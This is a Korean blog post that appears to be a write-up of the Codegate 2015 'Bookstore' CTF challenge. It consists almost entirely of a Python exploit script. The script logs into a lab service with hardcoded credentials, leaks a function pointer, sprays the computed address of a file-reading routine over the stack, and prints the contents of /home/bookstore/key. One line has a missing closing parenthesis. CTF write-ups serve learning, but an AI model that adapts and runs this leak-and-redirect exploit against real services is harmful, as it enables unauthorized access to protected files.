푸는데 오래걸리지는 않았지만 릭이 안 되는 경우가 가끔 있어서 짜증났던 문제.

이걸 스택 스프레이라고 불러도 될지 모르겠지만 어쨌든 남아있는 영역에서 참조하는게 문제가 되는 케이스이므로 그렇게 썼다. 이제 Bookstore2도 해야 하고...과제도... 으아아


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
HOST = '192.168.136.169'
PORT = 31330
 
#====================================================
offset_func1_read = 0xd2
adminID = 'helloadmin'
adminPW = 'iulover!@#$'
#====================================================
 
banner()
 
print "===================[ Phase 1 : Leak FuncPointer ]=================="
 
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))
 
sock.recv(1024)
sock.send(adminID)
sleep(0.1)
sock.recv(1024)
sock.send(adminPW)
sleep(0.1)
sock.recv(1024)
 
sock.send('1\n'# addBook
sleep(0.1)
sock.recv(2046)
 
sock.send('A'# name
sleep(0.1)
sock.recv(2046)
 
sock.send('A'# desc
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# book
sleep(0.1)
sock.recv(2046)
 
sock.send('2\n'# modify
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('3\n'# all
sleep(0.1)
sock.recv(2046)
 
sock.send(str(0x33333333)+'\n'# stock
sleep(0.1)
sock.recv(2046)
 
sock.send(str(0x34343434)+'\n'# price
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# ship
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# available
sleep(0.1)
sock.recv(2046)
 
sock.send('A'*20# name
sleep(0.1)
sock.recv(2046
 
sock.send('B'*20# description
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# back
sleep(0.1)
sock.recv(2046)
 
#============================================
 
sock.send('4\n'# view
sleep(0.1)
 
data = sock.recv(2048)
#sleep(0.1)
funcptr1 = up32(data[data.find('3333')+4:data.find('3333')+8])[0]
readFile = funcptr1 - offset_func1_read
print "[*] Find funcptr1 : "+hex(funcptr1)
print "[*] Find ReadFile : "+hex(readFile)
 
 
#mainmenu
 
#modify_name
 
print "================[ Phase 2 : Attack with Stack Spray ]==============="
 
sock.send('2\n'# modify
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# name
sleep(0.1)
sock.recv(2046)
 
sock.send(p32(readFile)*125)
sleep(0.1)
sock.recv(2046)
 
#============================================
 
sock.send('3\n'# all
sleep(0.1)
sock.recv(2046)
 
sock.send('1234\n'# stock
sleep(0.1)
sock.recv(2046)
 
sock.send('1234\n'# price
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n'# ship
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n'# available
sleep(0.1)
sock.recv(2046)
 
sock.send('/home/bookstore/key\x00'# name
sleep(0.1)
sock.recv(2046)
 
sock.send('Fxxx_Bookstore'# desc
sleep(0.1)
sock.recv(2046)
 
sock.send('4\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('1\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
sock.recv(2046)
 
sock.send('3\n'# view
sleep(0.1)
sock.recv(2046)
 
sock.send('0\n')
sleep(0.1)
data = sock.recv(2048)
print "Key : "+data[data.find('Fxxx_Bookstore')+15:data.find('\n', data.find('Fxxx_Bookstore')+15)]
 
sock.close()
cs


'CTF > 지난 대회' 카테고리의 다른 글

Codegate 2013 Prequal - vuln 300  (0) 2015.11.21
Codegate 2013 Prequal - vuln 200  (0) 2015.11.21
Codegate 2015 - Bookstore  (0) 2015.11.16
Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL  (0) 2015.11.03
Codegate 2013 Prequal - vuln 100  (0) 2015.10.30
PlaidCTF 2013 - pork  (0) 2015.10.29
블로그 이미지

__미니__

E-mail : skyclad0x7b7@gmail.com 나와 계약해서 슈퍼 하-카가 되어 주지 않을래?

댓글을 달아 주세요